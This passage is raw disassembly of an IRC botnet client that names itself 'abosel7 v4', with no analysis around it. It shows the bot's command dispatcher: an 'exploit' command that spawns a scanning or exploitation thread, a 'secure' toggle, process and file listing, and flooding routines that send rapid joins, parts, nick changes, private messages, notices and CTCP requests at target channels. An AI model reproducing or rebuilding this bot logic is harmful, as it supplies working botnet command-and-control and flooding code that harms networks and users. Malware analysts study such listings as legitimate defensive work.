or eax, 0FFFFFFFFh
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_404512: ; CODE XREF: sub_401ACD+15AE�j
; sub_401ACD+15C3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409823
push offset unk_42BCF8
call sub_415D38
add esp, 0Ch
jmp loc_4095AD
; ---------------------------------------------------------------------------
loc_404531: ; CODE XREF: sub_401ACD+1584�j
; sub_401ACD+1599�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BA9E
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404547: ; CODE XREF: sub_401ACD+155A�j
; sub_401ACD+156F�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BA49
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_40455D: ; CODE XREF: sub_401ACD+1530�j
; sub_401ACD+1545�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B9DD
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404573: ; CODE XREF: sub_401ACD+1506�j
; sub_401ACD+151B�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B90E
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_404589: ; CODE XREF: sub_401ACD+1461�j
; sub_401ACD+1476�j
push [ebp+esi+var_8C]
push 27h
push offset aProcessList ; "Process list"
push offset dword_42BCD8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4045A1: ; CODE XREF: sub_401ACD+1437�j
; sub_401ACD+144C�j
push [ebp+esi+var_8C]
push 24h
push offset aFindFile ; "Find file"
push offset dword_42BCBC
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4045B9: ; CODE XREF: sub_401ACD+1050�j
; sub_401ACD+1065�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_4045D8
push edi
call sub_41C159
test eax, eax
pop ecx
jz short loc_4045D8
push edi
call sub_41C159
pop ecx
jmp short loc_4045DD
; ---------------------------------------------------------------------------
loc_4045D8: ; CODE XREF: sub_401ACD+2AF5�j
; sub_401ACD+2B00�j
mov eax, dword_429074
loc_4045DD: ; CODE XREF: sub_401ACD+2B09�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_404602
push esi
loc_4045EF: ; CODE XREF: sub_401ACD+2B44�j
lea eax, [ebp+var_5A0]
push 10h
push eax
call sub_41C360
add esp, 0Ch
jmp short loc_404619
; ---------------------------------------------------------------------------
loc_404602: ; CODE XREF: sub_401ACD+2B1F�j
cmp [ebp+var_8FF], bl
jz short loc_404613
lea eax, [ebp+var_C4]
push eax
jmp short loc_4045EF
; ---------------------------------------------------------------------------
loc_404613: ; CODE XREF: sub_401ACD+2B3B�j
mov [ebp+var_5A0], bl
loc_404619: ; CODE XREF: sub_401ACD+2B33�j
mov eax, [ebp+var_4]
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax
mov [ebp+var_624], esi
call sub_41C360
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BC94
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 19h
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_411BCE
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4046CA
loc_4046B4: ; CODE XREF: sub_401ACD+2BFB�j
cmp [ebp+var_57C], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4046B4
; ---------------------------------------------------------------------------
loc_4046CA: ; CODE XREF: sub_401ACD+2BE5�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42BC58
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_401ACD+FFD�j
; sub_401ACD+1012�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4046FB
push esi
call sub_41C159
test ax, ax
pop ecx
jz short loc_4046FB
push esi
call sub_41C159
pop ecx
jmp short loc_404701
; ---------------------------------------------------------------------------
loc_4046FB: ; CODE XREF: sub_401ACD+2C17�j
; sub_401ACD+2C23�j
mov ax, word_429084
loc_404701: ; CODE XREF: sub_401ACD+2C2C�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call sub_41C360
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42BC2C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push edi
push eax
push [ebp+var_88]
push esi
call sub_409869
push ebx
lea eax, [ebp+var_2C4]
push 6
push eax
call sub_40B3BA
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40EF1C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4047D0
loc_4047BA: ; CODE XREF: sub_401ACD+2D01�j
cmp [ebp+var_968], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4047BA
; ---------------------------------------------------------------------------
loc_4047D0: ; CODE XREF: sub_401ACD+2CEB�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BBEC
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_4047E1: ; CODE XREF: sub_401ACD+FA9�j
; sub_401ACD+FBE�j ...
push edi
push offset aSecure ; "secure"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_404809
push edi
push offset aSec ; "sec"
call sub_41CA50
pop ecx
mov [ebp+var_AA8], ebx
test eax, eax
pop ecx
jnz short loc_404813
loc_404809: ; CODE XREF: sub_401ACD+2D23�j
mov [ebp+var_AA8], 1
loc_404813: ; CODE XREF: sub_401ACD+2D3A�j
push [ebp+var_88]
lea eax, [ebp+var_B2C]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_AA8], ebx
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
mov [ebp+var_AA0], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40485A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40485A: ; CODE XREF: sub_401ACD+2D86�j
push eax
push offset dword_42BBB8
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
push ebx
lea eax, [ebp+var_2C4]
push 22h
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_41A366
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4048CE
loc_4048B8: ; CODE XREF: sub_401ACD+2DFF�j
cmp [ebp+var_A9C], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4048B8
; ---------------------------------------------------------------------------
loc_4048CE: ; CODE XREF: sub_401ACD+2DE9�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42BB7C
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_4048DF: ; CODE XREF: sub_401ACD+F7F�j
; sub_401ACD+F94�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41ABFB
loc_4048F0: ; CODE XREF: sub_401ACD+2A75�j
; sub_401ACD+2A8B�j ...
add esp, 0Ch
jmp loc_409644
; ---------------------------------------------------------------------------
loc_4048F8: ; CODE XREF: sub_401ACD+F55�j
; sub_401ACD+F6A�j
push offset unk_42BB2C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_404902: ; CODE XREF: sub_401ACD+F2B�j
; sub_401ACD+F40�j
push offset aAbosel7V4 ; "abosel7 v4"
push offset dword_42BB1C
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_404911: ; CODE XREF: sub_401ACD+F01�j
; sub_401ACD+F16�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_404971
push esi
call sub_41C159
cmp eax, ebx
pop ecx
jl short loc_404966
cmp eax, 3
jge short loc_404966
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40495B
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42CD50
push eax
call sub_41C266
add esp, 0Ch
mov [esi], bl
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_40495B: ; CODE XREF: sub_401ACD+2E6D�j
push eax
push offset unk_42BAF0
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404966: ; CODE XREF: sub_401ACD+2E58�j
; sub_401ACD+2E5D�j
push eax
push offset unk_42BAC4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404971: ; CODE XREF: sub_401ACD+2E4D�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_404976: ; CODE XREF: sub_401ACD+2EC5�j
push [ebp+var_90]
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_404999
inc esi
add edi, 80h
cmp esi, 3
jl short loc_404976
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_404999: ; CODE XREF: sub_401ACD+2EB9�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
push offset unk_42CD50
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_4049B3: ; CODE XREF: sub_401ACD+ED7�j
; sub_401ACD+EEC�j
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403446
call sub_40B583
push ebx
call ds:dword_42706C ; ExitProcess
loc_4049D9: ; CODE XREF: sub_401ACD+19B1�j
push offset aGet_1 ; "get"
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404A67
cmp dword_4CF180, ebx
jz short loc_404A01
push offset dword_4CEB60
loc_4049F7: ; CODE XREF: sub_401ACD+2F98�j
push offset unk_42BA88
jmp loc_404A97
; ---------------------------------------------------------------------------
loc_404A01: ; CODE XREF: sub_401ACD+2F23�j
push 10h
pop eax
mov [ebp+var_2CC], eax
push eax
lea eax, [ebp+var_2E8]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call ds:dword_427214 ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E24]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax
call sub_41C266
add esp, 14h
lea eax, [ebp+var_E24]
push eax
jmp short loc_4049F7
; ---------------------------------------------------------------------------
loc_404A67: ; CODE XREF: sub_401ACD+2F1B�j
push edi
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_404A7B
push offset unk_42BA48
jmp short loc_404A97
; ---------------------------------------------------------------------------
loc_404A7B: ; CODE XREF: sub_401ACD+2FA5�j
push offset dword_4CEB60
call sub_41C890
pop ecx
mov dword_4CF180, 1
pop ecx
push edi
push offset unk_42BA1C
loc_404A97: ; CODE XREF: sub_401ACD+2F2F�j
; sub_401ACD+2FAC�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
jmp loc_40349D
; ---------------------------------------------------------------------------
loc_404AAB: ; CODE XREF: sub_401ACD+199C�j
push [ebp+arg_8]
push offset aExploit ; "exploit"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_404BB1
mov eax, [ebp+var_4]
mov esi, 80h
mov [ebp+var_13E8], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F8], eax
push offset aF ; "#f"
lea eax, [ebp+var_1478]
push esi
push eax
mov [ebp+var_13F0], 1
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_14F8]
push offset aF ; "#f"
push esi
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_1508]
push edi
push 10h
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_1508]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42B9E4
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 8
push eax
call sub_40B3BA
add esp, 18h
mov [ebp+var_13EC], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1508]
push ebx
push eax
push offset sub_40BB65
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_13EC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_404BA0
loc_404B8A: ; CODE XREF: sub_401ACD+30D1�j
cmp [ebp+var_13E0], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404B8A
; ---------------------------------------------------------------------------
loc_404BA0: ; CODE XREF: sub_401ACD+30BB�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B9A4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_404BB1: ; CODE XREF: sub_401ACD+2FEF�j
push [ebp+arg_8]
push offset aReconnect_in ; "reconnect.in"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4095B4
push [ebp+arg_8]
push offset aRin ; "rin"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4095B4
push [ebp+arg_8]
push offset aReconnect_in_m ; "reconnect.in.ms"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409570
push [ebp+arg_8]
push offset aRinms ; "rinms"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409570
push [ebp+arg_8]
push offset aFlood ; "flood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4057B7
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
push edi
push offset aLoad ; "load"
call sub_41CA50
add esp, 0Ch
test eax, eax
jnz short loc_404CB7
cmp [ebp+esi+var_80], ebx
jz short loc_404CB7
push [ebp+esi+var_80]
call sub_41C159
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41C159
pop ecx
push eax
push [ebp+esi+var_88]
call sub_417E06
add esp, 0Ch
lea eax, [ebp+var_2C4]
push [ebp+esi+var_84]
push [ebp+esi+var_88]
push [ebp+esi+var_80]
push offset unk_42B93C
push eax
call sub_41C266
add esp, 14h
cmp [ebp+var_8], ebx
jnz short loc_404CB7
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_404CB7: ; CODE XREF: sub_401ACD+3173�j
; sub_401ACD+3179�j ...
push edi
push offset aPm ; "pm"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404D21
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404D21
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax
call sub_41843B
push eax
lea eax, [ebp+var_47F0]
push eax
call sub_41C890
add esp, 14h
lea eax, [ebp+var_47F0]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_404D21: ; CODE XREF: sub_401ACD+31F9�j
; sub_401ACD+3204�j
push edi
push offset dword_42B920
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404D8B
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404D8B
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax
call sub_41843B
push eax
lea eax, [ebp+var_4AF4]
push eax
call sub_41C890
add esp, 14h
lea eax, [ebp+var_4AF4]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42B90C
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_404D8B: ; CODE XREF: sub_401ACD+3263�j
; sub_401ACD+326E�j
push edi
push offset aNt ; "nt"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404DF5
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404DF5
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax
call sub_41843B
push eax
lea eax, [ebp+var_48F0]
push eax
call sub_41C890
add esp, 14h
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "notice %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_404DF5: ; CODE XREF: sub_401ACD+32CD�j
; sub_401ACD+32D8�j
push edi
push offset aMode ; "mode"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404E5F
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404E5F
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push eax
call sub_41843B
push eax
lea eax, [ebp+var_4FF8]
push eax
call sub_41C890
add esp, 14h
lea eax, [ebp+var_4FF8]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aModeSS ; "mode %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_404E5F: ; CODE XREF: sub_401ACD+3337�j
; sub_401ACD+3342�j
push edi
push offset aJoin ; "join"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404E9C
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404E9C
push eax
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_404E9C: ; CODE XREF: sub_401ACD+33A1�j
; sub_401ACD+33AC�j
push edi
push offset aPart_0 ; "part"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404ED9
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404ED9
push eax
lea eax, [ebp+var_2C4]
push offset aPartS ; "part %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_404ED9: ; CODE XREF: sub_401ACD+33DE�j
; sub_401ACD+33E9�j
push edi
push offset aPartflood ; "partflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404F1B
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404F1B
push offset dword_427620
push eax
lea eax, [ebp+var_2C4]
push offset aPartSS ; "part %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_404F1B: ; CODE XREF: sub_401ACD+341B�j
; sub_401ACD+3426�j
push edi
push offset aPnick ; "pnick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_404F92
cmp [ebp+esi+var_88], ebx
jz short loc_404F92
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B8]
push edx
push [ebp+esi+var_88]
push offset aSI ; "%s%i"
push eax
call sub_41C266
add esp, 10h
lea eax, [ebp+var_17B8]
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_404F92: ; CODE XREF: sub_401ACD+345D�j
; sub_401ACD+3466�j
push edi
push offset aJoinPart ; "join/part"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4050E9
cmp [ebp+esi+var_88], ebx
jz loc_4050E9
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_427620
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427620
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 0C8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427620
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_4050E9: ; CODE XREF: sub_401ACD+34D4�j
; sub_401ACD+34E1�j
push edi
push offset dword_42B884
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405181
cmp [ebp+esi+var_88], ebx
jz short loc_405181
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41C2C2
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_2C4]
push edx
push [ebp+esi+var_88]
push offset dword_42B85C
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 24h
loc_405181: ; CODE XREF: sub_401ACD+362B�j
; sub_401ACD+3638�j
push edi
push offset aNick_0 ; "nick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405289
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz loc_405289
push eax
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
lea eax, [ebp+var_4BC]
push eax
call sub_417E84
add esp, 14h
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_417E84
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 1F4h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_417E84
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_405289: ; CODE XREF: sub_401ACD+36C3�j
; sub_401ACD+36D2�j
push edi
push offset aChgnick ; "chgnick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4052CE
lea eax, [ebp+var_180C]
push eax
call sub_417E84
pop ecx
lea eax, [ebp+var_180C]
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_4052CE: ; CODE XREF: sub_401ACD+37CB�j
push edi
push offset aMsg ; "msg"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4053C3
cmp [ebp+esi+var_88], ebx
jz loc_4053C3
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_427624
push [ebp+esi+var_88]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_4053C3: ; CODE XREF: sub_401ACD+3810�j
; sub_401ACD+381D�j
push edi
push offset aNotice_0 ; "notice"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4054B8
cmp [ebp+esi+var_88], ebx
jz loc_4054B8
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_427624
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 384h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_4054B8: ; CODE XREF: sub_401ACD+3905�j
; sub_401ACD+3912�j
push edi
push offset aCtcp ; "ctcp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4055D9
cmp [ebp+esi+var_88], ebx
jz loc_4055D9
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42B814
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42B7FC
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42B7E4
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42B7E4
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
loc_4055D9: ; CODE XREF: sub_401ACD+39FA�j
; sub_401ACD+3A07�j
push edi
push offset aMix ; "mix"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405709
cmp [ebp+esi+var_88], ebx
jz loc_405709
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
